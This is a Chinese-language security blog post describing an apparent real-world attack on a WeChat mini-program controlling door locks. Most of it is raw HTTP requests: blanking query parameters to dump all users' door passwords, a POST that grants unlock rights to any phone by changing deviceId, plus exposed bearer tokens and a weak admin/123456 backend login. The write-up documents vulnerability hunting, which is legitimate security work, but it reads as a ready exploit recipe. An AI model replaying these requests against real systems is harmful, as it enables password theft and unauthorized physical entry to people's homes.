某微信小程序未授权漏洞挖掘(置空查询思路)
某微信小程序未授权漏洞挖掘(置空查询思路)
明暗安全 2024-07-13 10:04
01
原创说明
本篇文章为苏木师傅实战案例分享
02
渗透记录
微信小程序
xxx
,点击门卡
-点击添加密码-截获数据包查看返回包可查看密码
,可越权授权如何手机号开门权限
03
未授权一
删除
userid和bind数值可查看全部用户密码
数据包:
GET/prod-api/nfc/device/list?userId=&isBind= HTTP/1.1
Host:XXX.XXX.cn
Xweb_xhr:1
Authorization:eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImUwMGY0YTY0LTNjZDctNDc1Zi1iN2NlLTc5ZDcwYWY3MjNjYyJ9.1LwhfaSNs34yL9mnACRLkviTL5NzbLCQwpv_jd0bjrsFcoFhMVsO7AD9C-K3jl83VA7RC5X_p53vCW4ZeWsqEQ
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531
Content-Type:application/json
Accept:*/*
Sec-Fetch-Site:cross-site
Sec-Fetch-Mode:cors
Sec-Fetch-Dest:empty
Referer:https://servicewechat.com/wx473f7c96d0986720/37/page-frame.html
Accept-Encoding:gzip, deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close
04
未授权二
可查看自己的密码
删除
deviceid、ismin、status值后可查看所有用户密码
数据包:
GET/prod-api/fy/cardkey/list?deviceId=&isMain=&status= HTTP/1.1
Host:XXX.XXX.cn
Xweb_xhr:1
Authorization:eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImUwMGY0YTY0LTNjZDctNDc1Zi1iN2NlLTc5ZDcwYWY3MjNjYyJ9.1LwhfaSNs34yL9mnACRLkviTL5NzbLCQwpv_jd0bjrsFcoFhMVsO7AD9C-K3jl83VA7RC5X_p53vCW4ZeWsqEQ
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531
Content-Type:application/json
Accept:*/*
Sec-Fetch-Site:cross-site
Sec-Fetch-Mode:cors
Sec-Fetch-Dest:empty
Referer:https://servicewechat.com/wx473f7c96d0986720/37/page-frame.html
Accept-Encoding:gzip, deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close
05
未授权三
数据包:
POST /prod-api/fy/cardkey HTTP/1.1
Host: xxx.xxx.cn
Content-Length: 131
Xweb_xhr: 1
Authorization: eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImJiMDIxZjZmLTZmY2UtNDRmOS04M2FlLTBkZmMxZDEyZTZlNiJ9.ndIZOlqG9vXCvb2EBc5efx14tz3VtED_uRrFrCS-FhyBNY4MQTdu08ZVU6QfrrACGmuH_eZbr_uRfWBsEVXT6g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531
Content-Type: application/json
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://servicewechat.com/wx473f7c96d0986720/37/page-frame.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"deviceId":"758","passType":"4","password":"978949","endData":0,"phone":"18888888888","startTime":"2024-01-19 09:00","endTime":""}
通过修改
deviceId
值可在任何账号中为指定手机授权开锁权限
06
弱口令
小程序看完了,看看web,运气不错弱口令进去了是若依系统,但可惜的是里面没有历史漏洞****
Url:https://
XXX.XXX
.cn/
账号:
admin
密码:
123456
本篇文章为苏木师傅实战案例分享